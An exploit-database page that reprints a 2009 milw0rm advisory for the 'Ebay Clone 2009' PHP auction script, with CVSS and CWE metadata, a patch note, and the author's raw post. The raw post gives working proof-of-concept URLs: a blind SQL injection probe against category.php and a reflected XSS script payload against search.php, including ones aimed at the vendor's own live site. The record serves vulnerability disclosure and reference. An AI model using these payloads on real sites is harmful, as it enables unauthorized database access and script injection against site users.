header-logo
Suggest Exploit
vendor:
Ebay Clone 2009
by:
Moudi
7,5
CVSS
HIGH
Blind SQL Injection and XSS
89, 79
CWE
Product Name: Ebay Clone 2009
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: ebayclonescript.com/ebayclone2009
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Ebay Clone 2009 Multiple Remote Vulnerabilities

The vulnerability exists in the 'category.php' and 'search.php' files of the Ebay Clone 2009 script. An attacker can exploit the Blind SQL Injection vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. An attacker can exploit the XSS vulnerability by sending a maliciously crafted HTTP request to the vulnerable script.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of the software.
Source

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [»] I'm back <3 VB6
==============================================================================
        [»] Ebay Clone 2009 Multiple Remote Vulnerabilities
==============================================================================

	[»] Script:             [ Ebay Clone 2009 ]
	[»] Language:           [ PHP ]
        [»] Download:           [ http://www.ebayclonescript.com/  ]
	[»] Founder:            [ Moudi or SixSo <m0udi@9.cn> ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man...]
        [»] Team:               [ EvilWay ]
        [»] SiteWeb:            [ Visit - www.opensc.ws ]
        [»] Price:              [ 99$ ]

###########################################################################

===[ Exploit BLIND SQL ]===	
	
	[»] http://www.site.com/patch/category.php?view=list&cate_id=[BLIND]
	[»] http://ebayclonescript.com/ebayclone2009/category.php?view=list&cate_id=1+AND%20SUBSTRING(@@version,1,1)=5

===[ Exploit XSS ]===	

        [»] http://www.site.com/patch/search.php?mode=[XSS]
	[»] http://ebayclonescript.com/ebayclone2009/search.php?mode=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

Note: in this script have some other blind sql and xss , but i am tired to do all :D


Author: Moudi

###########################################################################

# milw0rm.com [2009-07-10]

Navigation

Suggest Exploit

Services By CQR